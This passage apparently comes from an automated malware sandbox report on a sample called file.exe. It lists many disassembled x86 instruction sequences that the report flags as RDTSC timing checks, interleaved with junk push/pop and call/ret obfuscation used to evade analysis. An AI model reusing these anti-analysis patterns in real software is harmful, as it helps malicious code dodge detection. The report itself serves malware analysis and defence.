00007F45D50449ACh 0x00000050 mov dword ptr [ebp+1245D6DCh], eax 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 jmp 00007F45D50449B9h 0x0000005d pushad 0x0000005e jmp 00007F45D50449AEh 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ADD6 second address: 54ADE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ADE3 second address: 54ADE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546F11 second address: 546F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546F17 second address: 546F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546F1C second address: 546FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+12477A74h], esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov di, B0C6h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F45D5047A28h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d clc 0x0000003e sub dword ptr [ebp+122D3896h], esi 0x00000044 mov eax, dword ptr [ebp+122D1091h] 0x0000004a xor di, 3598h 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007F45D5047A28h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 0000001Dh 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b mov edi, 0B136976h 0x00000070 nop 0x00000071 push edx 0x00000072 pushad 0x00000073 pushad 0x00000074 popad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CE7C second address: 54CE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449ADh 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548FEB second address: 548FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F45D5047A26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549097 second address: 5490AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F45D50449A6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490AA second address: 5490BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480D2 second address: 5480E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F45D50449A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007F45D50449B0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54BFA5 second address: 54BFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D17E second address: 54D188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E176 second address: 54E184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Ah 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E26A second address: 54E278 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F162 second address: 54F166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552474 second address: 552478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1D60 second address: 4F1D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F45D5047A2Bh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1D71 second address: 4F1D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1D77 second address: 4F1D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1D7D second address: 4F1D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1D81 second address: 4F1D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1D8D second address: 4F1D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55959B second address: 55959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55959F second address: 5595AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5595AA second address: 5595C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D5047A2Bh 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5595C4 second address: 5595C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5595C9 second address: 5595CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559779 second address: 55977D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55977D second address: 559793 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F45D5047A2Eh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559793 second address: 5597B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F45D50449A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jl 00007F45D50449AAh 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5597B1 second address: 5597BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5597BD second address: 5597C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5597C3 second address: 5597C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5597C7 second address: 5597CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5597CB second address: 5597D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5597D1 second address: 5597E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D50449AAh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5597E1 second address: 5597EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5603E8 second address: 5603F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F45D50449A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5604E2 second address: 5604E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5604E6 second address: 560526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F45D50449B4h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jno 00007F45D50449A6h 0x0000001d pop ecx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560714 second address: 560723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560723 second address: 560728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560728 second address: 560733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F45D5047A26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560733 second address: 560750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45D50449B0h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560750 second address: 56078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jno 00007F45D5047A45h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5669A8 second address: 5669B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F45D50449A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5669B7 second address: 5669BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565BF4 second address: 565C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D50449B0h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565C0A second address: 565C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565DFC second address: 565E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565E00 second address: 565E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F45D5047A2Ch 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566682 second address: 56669F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F45D50449AFh 0x0000000b jbe 00007F45D50449A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56669F second address: 5666A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5666A4 second address: 5666A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5666A9 second address: 5666D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007F45D5047A28h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F45D5047A35h 0x00000016 jo 00007F45D5047A3Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5666D7 second address: 5666EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449AFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566870 second address: 56687C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56687C second address: 566882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566882 second address: 566886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534A3F second address: 534A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449ACh 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F45D50449AAh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F45D50449A8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b lea eax, dword ptr [ebp+1247C70Bh] 0x00000031 cmc 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534A88 second address: 534A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534A8C second address: 51ADB6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F45D50449A8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push ebx 0x0000002d mov ecx, dword ptr [ebp+122D2A47h] 0x00000033 pop edi 0x00000034 mov ecx, 6A9BBE60h 0x00000039 call dword ptr [ebp+122D3831h] 0x0000003f je 00007F45D50449BAh 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 pop edi 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535094 second address: 535098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535098 second address: 53509C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53509C second address: 5350A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350A2 second address: 5350C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45D50449B0h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535A60 second address: 535A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535A66 second address: 535A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535A6A second address: 535AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F45D5047A39h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D32E0h] 0x00000015 push 0000001Eh 0x00000017 mov di, 519Ch 0x0000001b nop 0x0000001c jmp 00007F45D5047A2Ah 0x00000021 push eax 0x00000022 jo 00007F45D5047A45h 0x00000028 pushad 0x00000029 jmp 00007F45D5047A37h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E62 second address: 535E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E66 second address: 535E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E6A second address: 535E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F45D50449B8h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jg 00007F45D50449A6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535F8E second address: 535F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535F92 second address: 51B833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F45D50449AAh 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 adc ecx, 71C99689h 0x00000019 sbb di, 3AD2h 0x0000001e call dword ptr [ebp+122D18B6h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B833 second address: 51B854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B854 second address: 51B882 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F45D50449B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F45D50449B1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D854 second address: 56D878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F45D5047A32h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45D5047A2Ah 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D878 second address: 56D890 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jc 00007F45D50449A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D890 second address: 56D8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A33h 0x00000009 popad 0x0000000a js 00007F45D5047A2Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D8B2 second address: 56D8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DA53 second address: 56DA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DA57 second address: 56DA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F45D50449A6h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DA67 second address: 56DA6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DA6B second address: 56DA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DE5F second address: 56DE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A35h 0x00000009 pop ebx 0x0000000a js 00007F45D5047A48h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DE82 second address: 56DE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DFC3 second address: 56DFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F45D5047A31h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F45D5047A2Ah 0x00000013 jnc 00007F45D5047A32h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DFF8 second address: 56DFFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E127 second address: 56E14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F45D5047A39h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
